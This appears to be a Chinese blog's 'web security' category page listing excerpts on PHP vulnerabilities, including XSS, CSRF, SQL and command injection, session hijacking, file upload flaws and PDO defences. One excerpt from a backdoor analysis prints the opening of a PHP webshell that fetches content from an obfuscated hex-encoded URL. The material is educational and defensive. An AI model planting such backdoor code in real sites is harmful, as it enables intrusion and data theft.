web安全
橙虚缘
这个作者很懒,什么都没留下…
展开
-
PHP漏洞全解(四)-xss跨站脚本攻击
XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS跨站脚本主要被攻击者利用来读取网站用户的cookies或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限。跨站脚本攻击的一般步骤:1、攻击者以某种方式发送xss的http链接给目标用户2转载 2013-07-31 22:38:30 · 952 阅读 · 0 评论 -
PDO防注入原理分析以及使用PDO的注意事项
1、页面之间无法传递变量get,post,session在最新的php版本中自动全局变量是关闭的,所以要从上一页面取得提交过来得变量要使用$_GET['foo'],$_POST['foo'],$_SESSION['foo']来得到。当然也可以修改自动全局变量为开(php.ini改为register_globals = On);考虑到兼容性,还是强迫自己熟悉新的写法比较好。2、Win转载 2015-10-20 22:05:04 · 469 阅读 · 0 评论 -
一猥琐的PHP后门分析
Webshell代码如下:<?phperror_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...转载 2016-04-18 14:03:22 · 1165 阅读 · 0 评论 -
app接口传输加密,AES+签名,php实现
一、说明数据在传输层加密,app端:生成签名,并且对数据对接加密,服务端:解密数据,校验签名通过抓包获取的效果http://127.0.0.1/test_server.php?sign_c=55d714ddd874ee29462f00e6c3173450&send_u_e=RKt80FF4BvBwOUk7HRxWvUlpuUNtg30HGIX3AFfNOqKTv3lacOUcImXPX原创 2018-01-23 15:07:24 · 2624 阅读 · 0 评论 -
PHP漏洞全解(六)-跨网站请求伪造
CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻转载 2013-08-05 17:48:37 · 1053 阅读 · 0 评论 -
PHP漏洞全解(五)-SQL注入攻击
SQL注入攻击(SQL Injection),是攻击者在表单中提交精心构造的sql语句,改动原来的sql语句,如果web程序没有对提交的数据经过检查,那么就会造成sql注入攻击。SQL注入攻击的一般步骤:1、攻击者访问有SQL注入漏洞的站点,寻找注入点2、攻击者构造注入语句,注入语句和程序中的SQL语句结合生成新的sql语句3、新的sql语句被提交到数据库中执行 处理4、数据库转载 2013-08-03 13:06:48 · 964 阅读 · 0 评论 -
PHP漏洞全解(三)-客户端脚本植入
客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。可以被用作脚本植入的HTML标签一般包括以下几种:1、标签标记的javascript和vbscript等页面脚本程序。在标签内可以指定js程序代码,也可以在src属性内指定js文件的URL路径2、标签标记的转载 2013-07-31 10:06:26 · 1238 阅读 · 0 评论 -
PHP漏洞全解(二)-命令注入攻击
命令注入攻击PHP中可以使用下列5个函数来执行外部的应用程序或函数system、exec、passthru、shell_exec、“(与shell_exec功能相同)函数原型string system(string command, int &return_var) command 要执行的命令 return_var 存放执行命令的执行后的状态值string转载 2013-07-31 09:46:36 · 785 阅读 · 0 评论 -
PHP漏洞全解(一)
针对PHP的网站主要存在下面几种攻击方式:1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request转载 2013-07-31 09:14:39 · 1447 阅读 · 0 评论 -
PHP MYSQL注入攻击需要预防7个要点
1:数字型参数使用类似intval,floatval这样的方法强制过滤。 2:字符串型参数使用类似mysql_real_escape_string这样的方法强制过滤,而不是简单的addslashes。 3:最好抛弃mysql_query这样的拼接SQL查询方式,尽可能使用PDO的prepare绑定方式。 4:使用rewrite技术隐藏真实脚本及参数的信息,通过rewrite正则也能过滤转载 2014-02-07 22:41:15 · 635 阅读 · 0 评论 -
PHP漏洞全解(八)-HTTP响应拆分
HTTP请求的格式1)请求信息:例如“Get /index.php HTTP/1.1”,请求index.php文件2)表头:例如“Host: localhost”,表示服务器地址3)空白行4)信息正文“请求信息”和“表头”都必须使用换行字符(CRLF)来结尾,空白行只能包含换行符,不可以有其他空格符。下面例子发送HTTP请求给服务器www.yhsaf转载 2014-07-10 10:06:15 · 731 阅读 · 0 评论 -
PHP漏洞全解(九)-文件上传漏洞
一套web应用程序,一般都会提供文件上传的功能,方便来访者上传一些文件。下面是一个简单的文件上传表单form action="upload.php" method="post" enctype="multipart/form-data" name="form1"> input type="file" name="file1" />br /> input type="submit" va转载 2014-07-10 10:12:53 · 683 阅读 · 0 评论 -
PHP漏洞全解(七)-Session劫持
服务端和客户端之间是通过session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session。每个用户的session都是独立的,并且由服务器来维护。每个用户的session是由一个独特的字符串来识别,成为session id。用户发出请求时,所发送的http表头内包含session id 的值。服务器使用http表头内的session id来识别时哪个用户提转载 2013-10-11 20:39:16 · 11651 阅读 · 0 评论 -
Web-Security-Learning
在学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。同步更新于: chybeta: Web-Security-Learning (带目录) 01月29日更新:新收录文章mysqlSSRF To RCE in MySQLMSSQLMSSQL不使用xp_cmdshell执行命令并获取回显的两种方法postgresql渗透中利用postgresql ge...转载 2018-05-24 14:52:50 · 1031 阅读 · 0 评论